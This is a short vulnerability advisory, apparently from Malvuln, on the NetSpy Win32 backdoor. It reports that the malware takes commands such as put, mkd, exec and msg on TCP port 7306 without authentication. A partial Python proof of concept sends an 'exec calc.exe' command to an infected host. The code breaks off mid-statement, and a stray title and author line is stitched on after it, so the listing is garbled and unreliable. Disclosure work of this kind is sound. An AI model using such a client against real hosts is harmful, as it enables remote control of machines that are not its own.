Discovery / credits: Malvuln - malvuln.com (c) 2022
Original source: https://malvuln.com/advisory/45d413b46f1d14a45e8fd36921813d62.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: Backdoor.Win32.NetSpy.10
Vulnerability: Unauthenticated Remote Command Execution
Description: The malware listens on TCP port 7306. Attackers who can reach infected hosts can run commands made available by the backdoor. Sending commands with Ncat or Telnet fails with errors, probably because the backdoor does not accept the linefeed characters they send, so a custom client is needed. Example commands available are put, mkd, exec and msg.
Family: NetSpy
Type: PE32
MD5: 45d413b46f1d14a45e8fd36921813d62
Vuln ID: MVID-2022-0551
Disclosure: 04/14/2022
Exploit/PoC:
from socket import *
import time

MALWARE_HOST="x.x.x.x"
PORT=7306
CMD="exec c:\Windows\system32\calc.exe"

def chk_res(s):
    res=""
    while True:
        res += s.recv(512)
        break
if "
Backdoor.Win32.NetSpy.10 Remote Command Execution
- Written by: khalil shreateh